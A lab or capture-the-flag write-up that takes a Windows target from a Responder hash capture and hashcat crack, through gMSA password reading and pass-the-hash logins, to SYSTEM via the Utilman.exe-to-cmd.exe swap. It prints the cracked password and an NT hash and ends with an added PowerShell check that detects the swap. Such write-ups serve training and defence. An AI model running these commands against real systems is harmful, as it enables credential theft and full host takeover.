# 80

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c71b5c7ede6da8aab361977da88989c714d8d521%2F70d6907bed51133f8c521ea681be8758.png?alt=media)

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0c624077fde687d799631c094ff2813bbecaa776%2F305f020ea8ec48dac347b2658b936b85.png?alt=media)

We can try running Responder and having the target visit our IP:

```
sudo responder -I tun0 -A
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-51ca9c42d3c9aec273e4fcfddda7f31694bc4abc%2F342c0433b97a127037c631ffa5ae36bc.png?alt=media)

We get a hash back:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c1643f1d132001b8f18e9dd37b641bd44d7ca868%2Fd6bbca990cb80d1186afac37930d94d9.png?alt=media)

We can crack this with hashcat:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-bdd95f4b7a96c29f897dfc802f8d5ce5e536428f%2F6fd5975685f43220a5447b7a69f93d46.png?alt=media)

The password is `california`.

We can log in with evil-winrm:

```
evil-winrm -i 192.168.180.165 -u enox -p 'california'
```

We find a `todo.txt` on enox's Desktop:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-46794e532c142ed2ef759336fc16036218a62ad6%2F4346d51c29e6d6b4a37eb57bcf6a0b28.png?alt=media)

We can check for gMSA accounts with PowerView loaded:

```
. .\PowerView.ps1
```

```
Get-ADServiceAccount -Filter * -Properties * | Select SamAccountName,PrincipalsAllowedToRetrieveManagedPassword,msDS-ManagedPasswordInterval,ServicePrincipalNames
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c947f626e6b6d14dc3d0ad84b6bf7fef9af4990b%2Fb4d6555ef7993fe507c4e2e3eb7775df.png?alt=media)

Now we can use GMSAPasswordReader.exe:

```
.\GMSAPasswordReader.exe --accountname 'svc_apache'
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-501a213f6c4b64b67858ea49d4fce48234e0a06d%2F63b34c5ee50f29aac488fdb47652b8e6.png?alt=media)

The `rc4_hmac` value is the same as the NT hash: the RC4-HMAC Kerberos key is the MD4 digest of the UTF-16LE password, which is exactly how the NT hash is computed.

Now log in with evil-winrm using the hash:

```
evil-winrm -i 192.168.183.165 -u svc_apache$ -H '4FC1682833B24CF2225248D67DF7E618'
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-8e5db3adfff01b366dad76f29ad8445211bb1799%2F8d8f7682f50275ba1bc4b0af25fb10bd.png?alt=media)

We have `SeRestorePrivilege`.

Now, following this page: <https://github.com/gtworek/Priv2Admin>

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-2489cb2db1e1c090c86614a49b295032e44e558c%2Ff54b0e55a216ac779bf61981ab82ffa4.png?alt=media)

```
ren "C:/Windows/System32/Utilman.exe" Utilman.old
```

```
ren "C:/Windows/System32/cmd.exe" Utilman.exe
```

Now we can get to the lock screen with rdesktop:

```
rdesktop 192.168.180.254
```

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0e3823bcc60a345a3da443cf8dbd8fec5706dbd1%2F815b7883b8d4d8ebf8175bd54adbacd9.png?alt=media)

Now press `Win + U`:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-1e7e470979050c44a52da682c8aca891a912e18f%2F70128606d6743f36ded129e883e01238.png?alt=media)

We have `NT AUTHORITY\SYSTEM`.

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d090e949cbd1c383828901aaba1438614394a63e%2F3e569bb1f993f056f7476fd010018baa.png?alt=media)
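As an added defender-side check (not from the original writeup or the Priv2Admin project), the PowerShell below audits the accessibility binaries the lock screen can launch for the swap performed above; it assumes an elevated session on the audited host, and a mismatched `OriginalFilename` is an indicator to investigate, not proof on its own.

```powershell
# Added example, not part of the original writeup. A renamed cmd.exe keeps
# cmd.exe's own version resource, so its OriginalFilename no longer matches
# the name on disk, and "ren ... Utilman.old" leaves a stray backup behind.
# Assumption: run from an elevated PowerShell prompt on the host being audited.

$system32 = Join-Path $env:SystemRoot 'System32'
$accessibilityBinaries = @(
    'Utilman.exe', 'sethc.exe', 'osk.exe', 'Narrator.exe',
    'Magnify.exe', 'DisplaySwitch.exe', 'AtBroker.exe'
)

function Test-AccessibilityBinary {
    param([string]$Name)

    $path = Join-Path $system32 $Name
    if (-not (Test-Path -LiteralPath $path)) { return }

    $item = Get-Item -LiteralPath $path
    $sig  = Get-AuthenticodeSignature -FilePath $path
    $orig = $item.VersionInfo.OriginalFilename

    # Indicator 1: the version resource says the file was built under another name.
    $nameMismatch = ($orig) -and ($orig -ine $Name)
    # Indicator 2: a leftover backup such as Utilman.old sits next to the binary.
    $backupPath = Join-Path $system32 ([IO.Path]::ChangeExtension($Name, '.old'))
    $backupLeft = Test-Path -LiteralPath $backupPath
    # Indicator 3: the signature is missing, broken, or not Microsoft's.
    $sigSuspect = ($sig.Status -ne 'Valid') -or
                  ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation')

    [pscustomobject]@{
        File             = $Name
        OriginalFilename = $orig
        SignatureStatus  = $sig.Status
        Suspicious       = [bool]($nameMismatch -or $backupLeft -or $sigSuspect)
        Reasons          = @(
            if ($nameMismatch) { "OriginalFilename is '$orig'" }
            if ($backupLeft)   { "stray backup $backupPath present" }
            if ($sigSuspect)   { 'signature not valid or not Microsoft' }
        ) -join '; '
    }
}

$accessibilityBinaries | ForEach-Object { Test-AccessibilityBinary $_ } |
    Format-Table File, OriginalFilename, SignatureStatus, Suspicious, Reasons -AutoSize
```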
